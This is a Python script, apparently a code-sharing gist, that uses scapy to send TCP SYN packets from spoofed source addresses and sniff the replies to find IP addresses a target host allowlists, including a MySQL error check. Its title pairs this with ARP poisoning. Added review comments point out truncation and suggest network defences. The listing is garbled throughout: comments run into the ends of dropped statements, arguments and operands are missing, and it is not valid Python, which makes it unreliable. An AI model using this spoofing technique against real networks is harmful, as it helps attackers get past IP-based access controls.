
Created February 18, 2018 15:26
Identify whitelisted IP addresses using spoofing techniques in conjunction with arp poisoning
#!/usr/bin/env python
#DiabloHorn -
#Find whitelisted IP addresses on a network & application level
import sys
import logging
import threading
import argparse
from scapy.all import *
# Root logger at INFO: the logging.debug() traces emitted by the sniffer
# callbacks below stay silent unless this level is lowered to DEBUG.
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
class checkreply(threading.Thread):
# Constructor: records the capture interface and the port list, marks the
# sniffer as running (self.started) and opens the file named by `spoofedips`.
# NOTE(review): this copy of the listing is truncated. The body of the
# `for line in fsrcips:` loop is missing (presumably it filled self.sips --
# confirm against the original), and no threading.Thread initialisation call
# is visible, so the block does not run as shown.
def __init__(self, iface, srcports, spoofedips):
self.iface = iface
self.srcports = srcports
self.sips = []
self.started = True
with open(spoofedips, 'r') as fsrcips:
for line in fsrcips:
def __buildportfilter(self, ports):
filterstr = 'port {0}'.format(ports[0])
for i in ports[1:]:
filterstr += ' or port {0}'.format(i)
return filterstr
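def run(self):
    """Thread body: capture TCP traffic on the configured ports.

    Each captured packet is handed to ``self.checkport``; ``self.stopflag``
    is used as the stop filter, so the capture ends on the first packet
    seen after ``stopsniffer()`` has been called. ``store=0`` keeps scapy
    from accumulating captured packets in memory.
    """
    logging.debug('Sniffer thread called')
    port_clause = self.__buildportfilter(self.srcports)
    # pcap filters give `and` and `or` equal precedence, left to right, so
    # "tcp and port A or port B" parses as "(tcp and port A) or port B" and
    # lets non-TCP traffic on port B through. Parenthesise the port list so
    # the `tcp` qualifier applies to every port.
    capture_filter = "tcp and ({0})".format(port_clause)
    sniff(
        iface=self.iface,
        store=0,
        prn=self.checkport,
        stop_filter=self.stopflag,
        filter=capture_filter,
    )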
def stopflag(self, pktdata):
logging.debug('Sniffer thread check stop flag')
if self.started:
return False
return True
def stopsniffer(self):
self.started = False
# Per-packet callback (passed as `prn` to sniff in run). Only packets that
# carry both an IP and a TCP layer are inspected.
# The flag tests read single bits of the TCP flags field:
#   (flags >> 1) & 1 -> SYN, (flags >> 2) & 1 -> RST,
#   (flags >> 3) & 1 -> PSH, (flags >> 4) & 1 -> ACK.
# Three cases are distinguished: RST from an address in self.sips, SYN/ACK
# addressed to one, and PSH/ACK (data) addressed to one.
# NOTE(review): this copy of the listing is damaged. The two comment lines
# are fused with the tail of a dropped statement, `TCP(,sport=...` has lost
# an argument, `if == 3306:` has lost its left operand, and the statements
# that followed these tests are missing. The block is not valid Python as
# shown and is left untouched rather than guessed at.
# For defenders: the signal used here is that the target answers some source
# addresses differently from others, so a source-IP allowlist on its own
# should not be treated as authentication.
def checkport(self,pktdata):
logging.debug('Sniffer packet inspection triggered')
if pktdata.haslayer(IP) and pktdata.haslayer(TCP):
ipdata = pktdata.getlayer(IP)
tcpdata = pktdata.getlayer(TCP)
if ipdata.src in self.sips and ((tcpdata.flags >> 2) & 1):
#we got a rst from spoofed IP, thus we found possible ip'{0} possibly allowed in whitelist RST'.format(ipdata.src))
if ipdata.dst in self.sips and ((tcpdata.flags >> 1) & 1) and ((tcpdata.flags >> 4) & 1):
#we got syn/ack, found possible ip'{0} possibly allowed in whitelist SYN/ACK'.format(ipdata.dst))
ackpkt = IP(src=ipdata.dst,dst=ipdata.src) / TCP(,sport=tcpdata.dport,seq=tcpdata.ack,ack=(tcpdata.seq+1),flags='A')
if ipdata.dst in self.sips and ((tcpdata.flags >> 4) & 1) and ((tcpdata.flags >> 3) & 1):
if == 3306:
# Application-level check: looks for the text 'is not allowed to connect' in
# str(data). A MySQL server includes that text in the error it returns to a
# host its grant tables reject, so its absence is read as "host accepted".
# NOTE(review): the last line is fused with the tail of a dropped statement
# in this copy, so the block is not valid Python as shown.
# NOTE(review): str(data) on a packet or bytes object gives its repr or
# rendering, not a decoded payload -- confirm what the caller passes in.
def check_mysql(self, ip, data):
banner = 'is not allowed to connect'
if banner not in str(data):'{0} confirmed allowed in whitelist'.format(ip))
# Script entry point: parses the target address, capture interface, port
# list and the path of the source-address file, then builds the reply
# checker and one TCP SYN per (port, source address) pair.
# NOTE(review): this copy of the listing is truncated. The `except` line has
# no matching `try:` and is fused with the tail of a dropped statement, and
# the statements that use `replychecker` and `pkt` after they are created are
# not present. The block is not valid Python as shown.
# For defenders: source addresses are taken verbatim from the file. Source
# address validation at the network edge (BCP 38 / uRPF) and dynamic ARP
# inspection on access switches are the controls that keep frames with a
# foreign source address from being delivered or answered.
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='scan target with spoofed IP to identify whitelist')
parser.add_argument('targetip',type=str,help='target ip to perform port scan on')
parser.add_argument('-i', '--iface',type=str,required=True,help='network interface to use')
parser.add_argument('-p', '--ports',nargs='+',type=int,required=True,help='space separated list of ports')
parser.add_argument('-s', '--srcips',type=str,required=True,help='file with IPs to spoof')
myargs = parser.parse_args()
replychecker = checkreply(myargs.iface,myargs.ports,myargs.srcips)
for port in myargs.ports:
with open(myargs.srcips, 'r') as fsrcips:
for line in fsrcips:
pkt = IP(dst='{0}'.format(myargs.targetip),src='{0}'.format(line.strip())) / TCP(dport=port,flags='S')
except KeyboardInterrupt:'ctrl-c stopping sniffer')